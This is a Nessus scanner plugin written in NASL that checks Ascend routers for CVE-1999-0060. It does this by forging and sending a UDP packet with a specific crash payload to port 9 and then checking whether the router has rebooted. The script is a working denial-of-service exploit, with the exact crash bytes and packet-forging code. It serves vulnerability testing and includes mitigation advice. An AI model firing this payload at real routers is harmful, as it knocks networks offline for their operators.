home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ascend_kill.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  96 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10019);
  10.  script_bugtraq_id(714);
  11.  script_version ("$Revision: 1.18 $");
  12.  script_cve_id("CVE-1999-0060");
  13.  name["english"] = "Ascend Kill";
  14.  name["francais"] = "Ascend Kill";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "It was possible to make
  18. the remote Ascend router reboot by sending
  19. it a UDP packet containing special data on
  20. port 9 (discard).
  21.  
  22. An attacker may use this flaw to make your
  23. router crash continuously, preventing
  24. your network from working properly.
  25.  
  26. Solution : filter the incoming UDP traffic coming
  27. to port 9. Contact Ascend for a solution.
  28.  
  29. Risk factor : High";
  30.  
  31.  desc["francais"] = "Il a ΘtΘ possible de faire
  32. rebooter le server Ascend distant en lui envoyant
  33. un paquet UDP contenant des donnΘes spΘciales
  34. sur le port 9 (discard).
  35.  
  36. Un pirate peut utiliser ce problΦme pour continuellement
  37. faire rebooter votre routeur, empechant ainsi votre 
  38. rΘseau de fonctionner correctement.
  39.  
  40. Solution : filtrez le traffic UDP entrant en direction
  41. du port 9, contactez Ascend pour une solution.
  42.  
  43. Facteur de risque : ElevΘ";
  44.  
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "Crashes an ascend router";
  49.  summary["francais"] = "Fait planter un routeur ascend";
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_KILL_HOST);
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  56.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  script_family(english:family["english"], francais:family["francais"]);
  60.  
  61.  exit(0);
  62. }
  63.  
  64. #
  65. # The script code starts here
  66. #
  67.  
  68. start_denial();
  69.  
  70. crash = raw_string(0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 
  71.     0x81, 0x00, 0x00, 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 
  72.     0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 
  73.     0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 
  74.     0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 
  75.     0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53);
  76.  
  77. port = 9;
  78. ip = forge_ip_packet(ip_hl: 5,         ip_v : 4,    ip_tos : 123,
  79.              ip_len : 80,     ip_id:1234,    ip_off : 0,
  80.              ip_ttl : 0xff,    ip_p:IPPROTO_UDP,
  81.              ip_src : this_host());
  82. udp = forge_udp_packet(ip:ip,
  83.             uh_sport : 9,
  84.             uh_dport : 9,
  85.             uh_ulen  : 60,
  86.             data:crash);
  87.  
  88. send_packet(udp, pcap_active:FALSE) x 10;
  89. sleep(5);
  90. alive = end_denial();                         
  91. if(!alive){
  92.           security_hole(port, protocol:"udp");
  93.         set_kb_item(name:"Host/dead", value:TRUE);
  94.         }
  95.  
  96.